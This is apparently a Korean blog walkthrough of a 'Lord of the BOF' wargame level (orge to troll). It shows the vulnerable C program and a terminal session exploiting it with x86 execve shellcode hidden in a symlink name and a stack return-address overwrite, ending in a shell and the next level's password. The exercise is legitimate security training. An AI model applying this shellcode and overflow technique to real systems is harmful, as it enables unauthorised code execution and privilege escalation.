-
[lob] orge -> troll공부/LOB 2014. 7. 30. 20:04
[orge@localhost orge]$ cat troll.c
/*
The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
// here is changed
if(argc != 2){
printf("argc must be two!\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n"ㅅ);
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// one more!
memset(argv[1], 0, strlen(argv[1]));
}
//심볼릭 링크를 걸어서 실행
[orge@localhost orge]$ ln ./troll `perl -e'print "troll123"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ./`perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "a"*44+"\x27\xfc\xff\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'?
argv[0] : BFFFFBA9 / ./?^12l?u楕凹2핽i00tii0cjo??T??
귁?
Segmentation fault (core dumped)
[orge@localhost orge]$ Xshell./t
bash2: Xshell./t: No such file or directory
[orge@localhost orge]$ ./trolla
argc must be two!
[orge@localhost orge]$ ./`perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "a"*44+"\x27\xfc\xff\xbf"'`aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'?
argv[0] : BFFFFBA9 / ./?^12l?u楕凹2핽i00tii0cjo??T??
귁?
Segmentation fault (core dumped)
[orge@localhost orge]$ ./`perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "a"*44+"\xa9\xfb\xff\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa₁
argv[0] : BFFFFBA9 / ./?^12l?u楕凹2핽i00tii0cjo??T??
귁?
bash$ ls
1 dump.h troll trolla ??^1??2?l??????u????????2?Qi00tii0cjo??QT???????
core test troll.c trolla.c
bash$
bash$ q
sh: q: command not found
bash$ exit
exit
[orge@localhost orge]$ rm perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
>
[orge@localhost orge]$ rm `perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ls
1 core dump.h test troll troll.c trolla trolla.c
[orge@localhost orge]$ ln -s troll `perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ./`perl -e'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "a"*44+"\xa9\xfb\xff\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa₁
bash$ ls
ls: .: Permission denied
bash$ my-pass
euid = 508
aspirin
bash$'공부 > LOB' 카테고리의 다른 글
[lob] vampire -> skeleton (3) 2014.07.30 [lob] troll -> vampire (0) 2014.07.30 [lob] orge -> troll (0) 2014.07.30 [lob] darkelf -> orge (0) 2014.07.30 [lob] wolfman -> darkelf (0) 2014.07.30 [lob] orc -> wolfman (0) 2014.07.30